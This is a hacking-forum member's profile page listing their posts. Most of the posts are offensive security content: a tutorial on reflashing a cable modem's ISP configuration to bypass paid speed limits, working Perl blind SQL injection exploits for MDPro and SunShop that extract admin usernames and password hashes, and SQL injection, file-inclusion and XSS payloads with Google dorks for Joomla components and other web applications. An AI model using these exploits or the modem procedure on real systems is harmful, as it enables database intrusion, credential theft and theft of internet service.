Jump to content

drgs

Members
  • Posts

    15
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

drgs's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Daca ar fi cum zic astia, majoritatea tinerilor ar fi in puscarie.
  2. Folositoare, multumesc !
  3. Hack Your Modem And Increase Your Download Speed Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so on This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like. It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information on how to accomplish this task. But this tutorial will no guarantee you 100% success. Okay here we go. I'm going to try to explain you as best as I can to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modem Theory of cable modem working All the cable modems when it boots up it will search for an "Image file" where in all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up it query TFTP server and download Image file from TFTP server according to this this our speed limits will be set. Our Mission Get this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server. Steps to accomplish 1). Get cable modems MAC address 2). Get your ISPs TFTP server IP address 3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server. 4). Download Image file from ISP`s TFTP server. 5). Decrypt the Image file which you downloaded from ISP`s TFTP server 6). Modify the Image file 7). Encrypt the modified Image file . Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server) 9). Host TFTP server in your computer 10). Put Image file in the base directory of your TFTP 11). Restart your modem 12). Changer your PC's IP back as given by ISP 13). OOPS Done. Start surfing with your new speed 1). Get cable modems MAC address You can either look at the back of the modem to get this MAC Address or you can logon to your Cable modem with your Web Browser hxxp://192.168.100.1/ . This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even more vital information on configuration. Unless it is turned off by your ISP. This feature might be totally turned off by your ISP. 2). Get your ISPs TFTP server IP address 3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server. For getting this vital information you have to do an SNMP walk over your modem. For doing this you can use any one of the tools below a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem Or Experts can use Solarwinds SNMP program Or c) Beginners can use DOCSIS Diagnosis utility Or d) Beginners can use SNMPWALK Tool use command "snmpwalk 192.168.100.1 public" NOTE: Use modem's IP address as "192.168.100.1" (SB5100, SB4100 and SB3100) when it asked to provide by any of the above tools. SNMP community is "Public" Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your "Image file" stored in that TFTP server All your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down) Among these, the one we need are: Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc) Configuration filename = isrr.bin (replace this with yours throughout in the doc) And IP fragments created = 0 IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx IP address.192.168.100.1 = 192.168.100.1 (the IP address of the cable modem, (replace this with yours throughout in the doc) IP-to-If-index.10.xxx.xxx.xxx = 2 Suggestion: You can do this step by sniffing the modem i.e. "192.168.100.1" when modem boots up. I never tried this method. Try your luck. 4). Download Image file from ISP`s TFTP server. For doing this got to your command prompt and use below commands with out quotes and bracket. "C:\tftp -i <ISP`s TFTP server IP> GET <Image filename> <local filename>" Okay now you got Image file from your ISP`s TFTP server. 5). Decrypt the Image file which you downloaded from ISP`s TFTP server 6). Modify the Image file 7). Encrypt the modified Image file Use docsis tool which you can download from Code: http://sourceforge.net/projects/docsis using this program you can decrypt image file change the upload speed and download speed ,save it and encrypt back. Rename this newly created file same as your original image file. . Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server) Go to my network place and right click ->properties Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values Configure your TPC's TCP settings as below IP: 194.*.*.90 (replace with the ISP's TFTP server) Netmask: 255.255.255.0 Gateway: 192.168.100.1 (replace with your cable modem's IP address) Note: Gateway should be 192.168.100.1 then only your modem can communicate with computer. 9). Host TFTP server in your computer 10). Put Image file in the base directory of your TFTP 11). Restart your modem Download TFTP Server software and host TFTP server in your computer You can download TFTP server from: Code: ftp://ftp.ida.net/pub/wireless/tftpd32.exe Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname. Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC 12). Changer your PC's IP back as given by ISP 13). OOPS Done. Start surfing with your new speed Now you change your TCP settings of your PC back to normal as given by ISP. (I.e. Put your original IP address and gateway) Oops you hacked your modem. Test out by downloading some files using DAP (Download accelerator plus) Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 8,9,10,11 and 12 Enjoy _________________
  4. #!/usr/bin/perl use strict; use IO::Socket; my $app = "MDPro 1.0.76"; my $type = "SQL Injection"; my $author = "undefined1_"; my $settings = "magic_quotes_runtime = off, mysql >= 4.1.0"; $| = 1; print ":: $app $type - by $author ::\n\n\n"; my $url = shift || usage(); if($url =~ m/^(?:http:\/\/)(.*)/) { $url = $1; } if($url !~ m/^.*\/$/) { $url .= "/"; } get_md5s($url); print "don't forget to delete the referers from the admin interface...\n"; sub get_md5s { my $url = shift; $url .= "index.php"; my $admins_only = shift; my $ps = 0; my $referer = "Firefox ID=". randstring(20,25); my $uid_charset = "1234567890"; my $user_charset = "abcdefghijklmnopqrstuvwxyz-_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ][}{+=/\\'\"\@\$#!%^&*()"; my $pass_charset = "afc0123456789abde"; my $data = "GET " . parse_page($url) . " HTTP/1.1\r\n"; $data .= "Host: " . parse_host($url) . "\r\n"; $data .= "Referer: $referer\r\n"; $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $data .= "Connection: close\r\n\r\n"; my $recv = sendpacket(parse_host($url), parse_port($url), $data); $ps++; $data = "GET " . parse_page($url) . " HTTP/1.1\r\n"; $data .= "Host: " . parse_host($url) . "\r\n"; $data .= "Referer: '\r\n"; $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $data .= "Connection: close\r\n\r\n"; $recv = sendpacket(parse_host($url), parse_port($url), $data); $ps++; if($recv !~ m/Call to undefined function PN_DBMsgError/m) { print "magic quotes = on ;-[\n"; return $ps; } my $recv; my $lastuid = 0; while(1) { my $uid_length = length("$lastuid"); my $user_length = 1; my $pass_length = 32; my $uid = ""; my $user = ""; my $pass = ""; my $O_RLY = 0; for(my $x = $uid_length; $x <= 8; $x++) { print "\ruid length = $uid_length"; $data = "GET " . parse_page($url) . " HTTP/1.1\r\n"; $data .= "Host: " . parse_host($url) . "\r\n"; $data .= "Referer: $referer' and (select 1 from md_group_membership where length(CONCAT(pn_uid))=$x and pn_uid>$lastuid and pn_gid=2 limit 1 order by pn_uid asc)=1 order by 1 asc/*\r\n"; $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $data .= "Connection: close\r\n\r\n"; $recv = sendpacket(parse_host($url), parse_port($url), $data); $ps++; if($recv =~ m/Call to undefined function PN_DBMsgError/m) { $uid_length = $x; $x = 9; $O_RLY = 1; } } if($O_RLY == 0) { return $ps; } $O_RLY = 0; print "\ruid length = $uid_length\n"; for(my $i = 1; $i <= $uid_length; $i++) { for(my $j = 0; $j < length($uid_charset); $j++) { my $key = substr($uid_charset, $j, 1); my $hex_key = sprintf("0x%02x", ord($key)); print "\ruid = $uid$key"; $data = "GET " . parse_page($url) . " HTTP/1.1\r\n"; $data .= "Host: " . parse_host($url) . "\r\n"; $data .= "Referer: $referer' and (select 1 from md_group_membership where substring(pn_uid,$i,1)=$hex_key and pn_uid>$lastuid and pn_gid=2 order by pn_uid asc limit 1)=1 order by 1 asc/*\r\n"; $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $data .= "Connection: close\r\n\r\n"; $recv = sendpacket(parse_host($url), parse_port($url), $data); $ps++; if($recv =~ m/Call to undefined function PN_DBMsgError/m) { $uid .= $key; $j = length($uid_charset); } } } print "\ruid = $uid\n"; for(my $x = $user_length; $x <= 25; $x++) { print "\ruser length = $x"; $data = "GET " . parse_page($url) . " HTTP/1.1\r\n"; $data .= "Host: " . parse_host($url) . "\r\n"; $data .= "Referer: $referer' and (select 1 from md_users where length(pn_uname)=$x and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n"; $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $data .= "Connection: close\r\n\r\n"; $recv = sendpacket(parse_host($url), parse_port($url), $data); $ps++; if($recv =~ m/Call to undefined function PN_DBMsgError/m) { $user_length = $x; $x = 26; $O_RLY = 1; } } if($O_RLY == 0) { return $ps; } $O_RLY = 0; print "\ruser length = $user_length\n"; for(my $i = 1; $i <= $user_length; $i++) { for(my $j = 0; $j < length($user_charset); $j++) { my $key = substr($user_charset, $j, 1); my $hex_key = sprintf("0x%02x", ord($key)); print "\ruser = $user$key"; $data = "GET " . parse_page($url) . " HTTP/1.1\r\n"; $data .= "Host: " . parse_host($url) . "\r\n"; $data .= "Referer: $referer' and (select 1 from md_users where substring(pn_uname,$i,1)=$hex_key and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n"; $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $data .= "Connection: close\r\n\r\n"; $recv = sendpacket(parse_host($url), parse_port($url), $data); $ps++; if($recv =~ m/Call to undefined function PN_DBMsgError/m) { $user .= $key; $j = length($user_charset); } } } print "\ruser = $user\n"; # pour le pass, faire genre un tolower du char direct dans la sql query for(my $i = 1; $i <= $pass_length; $i++) { for(my $j = 0; $j < length($pass_charset); $j++) { my $key = substr($pass_charset, $j, 1); my $hex_key = sprintf("0x%02x", ord($key)); print "\rpassword = $pass$key"; $data = "GET " . parse_page($url) . " HTTP/1.1\r\n"; $data .= "Host: " . parse_host($url) . "\r\n"; $data .= "Referer: $referer' and (select 1 from md_users where lower(substring(pn_pass,$i,1))=$hex_key and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n"; $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $data .= "Connection: close\r\n\r\n"; $recv = sendpacket(parse_host($url), parse_port($url), $data); $ps++; if($recv =~ m/Call to undefined function PN_DBMsgError/m) { $pass .= $key; $j = length($pass_charset); } } } print "\rpassword = $pass\n\n"; exit; } } # ====================================================== sub parse_host { my $url = shift; if($url =~ m/^([^\/:]+).*\//) { return $1; } return "127.0.0.1"; } sub parse_port { my $url = shift; if($url =~ m/^(?:[^\/:]+)\d+)\//) { return $1; } return "80"; } sub parse_page { my $url = shift; if($url =~ m/^(?:[^\/]+)(\/.*)/) { return $1; } return "/"; } sub randstring(\$,\$) { my $min = shift; my $max = shift; my $length = int( (rand(65535)%($max-$min+1))+$min); my $ret = ""; for(my $i = 0; $i < $length; $i++) { my $w = int(rand(3)); if($w == 0) { $ret .= chr(97 + int(rand(26))); } elsif($w == 1) { $ret .= chr(65 + int(rand(26))); } else { $ret .= chr(48 + int(rand(10))); } } return $ret; } sub sendpacket { my $server = shift; my $port = shift; my $data = shift; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die ":: Could not connect to $server:80 $!\n"; print $sock "$data"; $data = ""; my $resp; while($resp = <$sock>) { $data .= $resp; } close($sock); return $data; } sub usage() { printf "usage: %s <url>\n", $0; exit; }
  5. joomla com_gmaps 1.00 Remote SQl Injection Found: Cyber-Security Exploit: index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/
  6. ******************************************************************************* # Title : Joomla Component NeoRecruit <= 1.4 (id) Remote Blind SQL Injection Vulnerability # Author : ajann # Contact : # S.Page : [url]http://www.neojoomla.com/[/url] # $$ : 54,90 € # Dork : inurl:index.php?option=com_NeoRecruit # DorkEx : [url]http://www.google.com.tr/search?hl=tr&q=inurl%3A%22index.php%3Foption%3Dcom_ponygallery%22&btnG=Ara&meta=lr%3D[/url] ******************************************************************************* [[SQL]]]--------------------------------------------------------- [url]http://[target]/[/url][path]//index.php?option=com_neorecruit&task=offer_view&id=[SQL Inject] Example: //index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/* [[/SQL]]
  7. #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print "\n \\#'#/ "; print "\n (-.-) "; print "\n -----------------oOO---(_)---OOo------------------"; print "\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |"; print "\n | k1tk4t - Indonesia - newhack[dot]org |"; print "\n | coded by DNX [dnx(at)hackermail.com] |"; print "\n --------------------------------------------------"; print "\n[!] Vendor: http://www.turnkeywebtools.com"; print "\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter"; print "\n[!] Solution: install v4.0.1"; print "\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>"; print "\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins"; print "\n[!] Options:"; print "\n -i [no] Valid User-ID, default is 1"; print "\n -c [no] Valid Category-ID with products, default is 1"; print "\n -o [no] 1 = get username (default)"; print "\n 2 = get password"; print "\n -t [name] Changes the admin table name, default is admins"; print "\n -p [ip:port] Proxy support"; print "\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $user = 1; my $cat = 1; my $column = "username"; my $table = "admins"; my %options = (); GetOptions(\%options, "i=i", "c=i", "o=i", "t=s", "p=s"); print "[!] Exploiting...\n"; if($options{"i"}) { $user = $options{"i"}; } if($options{"c"}) { $cat = $options{"c"}; } if($options{"o"} && $options{"o"} == 2) { $column = "password"; } if($options{"t"}) { $table = $options{"t"}; } syswrite(STDOUT, "data:", 5); for(my $i = 1; $i <= 32; $i++) { my $found = 0; my $h = 48; while(!$found && $h <= 57) { if(istrue2($host, $path, $table, $user, $i, $h)) { $found = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$found) { $h = 97; while(!$found && $h <= 122) { if(istrue2($host, $path, $table, $user, $i, $h)) { $found = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[!] Exploit done\n"; sub istrue2 { my $host = shift; my $path = shift; my $table = shift; my $uid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $url = "http://".$host.$path."index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=".$cat.")%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20WHERE%20id=".$uid."),".$i.",1)=CHAR(".$h.")/*"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $response = $ua->get($url); my $content = $response->content; my $regexp = "Add To Cart"; if($content =~ /$regexp/) { return 1; } else { return 0; } }
  8. Google dork:"Powered by AMCMS3" Remote File Inclusion --------------------- It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver. Proof of Concept: index.php?loadpage=../../../../file index.php?loadpage=[evilscript] Solution: Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of accepted filenames and restrict the input to that list. For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. It is recommended to disable this option from php.ini. SQL Injection ------------- An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Proof of Concept: index.php?blockpage=%2E%2Findex%2Ephp %3Fblockpage%3D1%26cat%3D&cat=[SQL Injection] index.php?blockpage=%2E%2Findex%2Ephp %3Fblockpage%3D1%26cat%3D&cat=' Solution: Your script should filter metacharacters from user input. Vendor was contacted by email and didn't not replied.
  9. #By KiNgOfThEwOrLd --------------------------------------------------------------- PoC D'u need an explanation?!? i don't think so --------------------------------------------------------------- SQL Injection [url]http://[target]/[/url][tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=%27 Little examples Using user() and database() functions u can get some informations about the database...as: [url]http://[target]/[/url][tilde_path]/index.php?id=[yeardetail_id] &mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/* Or u can get some recordes by the database like: [url]http://[target]/[/url][tilde_path]/index.php?id=[id] &mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name] /**/from/**/[table_name]/* D'u want the tables n' the rows? Find it yourself ;P --------------------------------------------------------------- something else.. Xss Vulnerability [url]http://[target]/[/url][tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=[XSS] --------------------------------------------------------------- Full Path Disclosure [url]http://[target]/[/url][tilde_path]/index.php?search=% 3C&mode=search&sider=on&tss=on&linier=on ---------------------------------------------------------------
×
×
  • Create New...